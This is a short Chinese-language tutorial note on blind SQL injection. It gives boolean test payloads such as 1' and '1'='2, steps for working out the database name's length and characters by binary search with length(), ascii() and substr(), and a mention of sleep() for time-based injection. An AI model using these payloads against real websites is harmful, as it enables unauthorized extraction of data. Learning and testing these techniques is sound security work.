SQL盲注

针对不回显的sql注入，可以利用布尔和延时注入来进行判断

例如布尔的判断是否注入成功
1 and 1=2
1' and '1'='2
1" and "1"="2

1 当输入1' and '1'='2显示为假时，则说明注入成功；

2 接下来判断字符串长度
利用length()函数，通过二分法来判断
id=1' and length(database())>10 --
id=1' and length(database())>5 --

3通过ascII码的范围，利用二分法来判断每个字符的值，再转换为英文
ascii() 函数 ascii码范围在0-127
id=1' and ascii(substr(database(),1,1))>64 --

大于64为真，则值再64<字母<127 然后逐步来判断ascii码的值，最终确定字母

当没有回显时候，利用延时注入的函数判断
sleep()